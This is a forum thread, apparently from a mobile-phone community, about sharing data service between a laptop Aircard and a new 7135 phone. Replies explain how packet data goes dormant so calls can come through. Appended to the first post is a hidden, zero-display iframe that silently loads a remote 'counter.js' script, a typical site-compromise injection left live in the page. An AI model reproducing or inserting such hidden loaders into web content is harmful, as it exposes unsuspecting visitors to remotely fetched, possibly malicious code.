I am eagerly awaiting my 7135 due to arrive on Tuesday, but I seem to have a little problem here in deciding how to configure my services. I currently have express network using the Aircard on my laptop, which I use all the time for connecting to remote computers over vpn and doing work remotely from airports, cars, vacation locations, client offices, etc. Right now my laptop and cell phone make up most of my "office". But now I want express network on the 7135 so I have high speed access to the web and email, etc., from my phone, but don't want to give up the acct on my aircard because I will often be online with the laptop for several hours, and if I used the 7135 as a modem instead, I wouldn't be able to receive any calls during that time (makes it difficult for a business to run if the phone is always busy).
so now it seems I need express network for both my aircard and my 7135. Anyone out there in a similar situation, or anyone with any creative ideas?
2 unlimited express network accts would be $200. Or perhaps I do the lower cost express network addon for my phone, but keep the unlimited for the aircard? help?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Can someone with the phone or in the know make this more clear?
There should be a setting to disconnect after so long. On the 6035 it has a 1,2,3 or power off setting for the idle timeout. So if your not downloading or browsing then it will timeout. So I'm guessing there is a similar setting on the 7135. It has been my experince that when your on the internet, with phone, when someone calls it will knock you off and you can answer the call.
It depends on the type of data availability in your area. 1xRTT is a packet data connection. If it's not sending or recieving data, it goes dormant. You can then make and recieve calls. This is wether you are using it as a stand alone connection, or as a modem for your laptop.
Time out settings are for circuit switched data (14.4kbps), like the 6035. However, ALLTEL might not offer 1xRTT data, and you may be stuck with CSD.
Thanks for the help folks. I think it would help when I am surfing the web, since there are many occasions where the connection would be idle during surfing.
When I am working, however, I am usually running an X-client over vpn to a unix machine on my laptop, and I think in that case, I don't think that the connection ever sits dormant for any length of time (i.e., if I lose the connection, my X client always dies within seconds later, even if I am not doing anything).
Sounds like what you are saying is that if I can get my X client software to stay alive and allow disconnects in between without aborting, then calls can be made in between. Not sure if I can configure it to do that, but I'll definitely look into it.
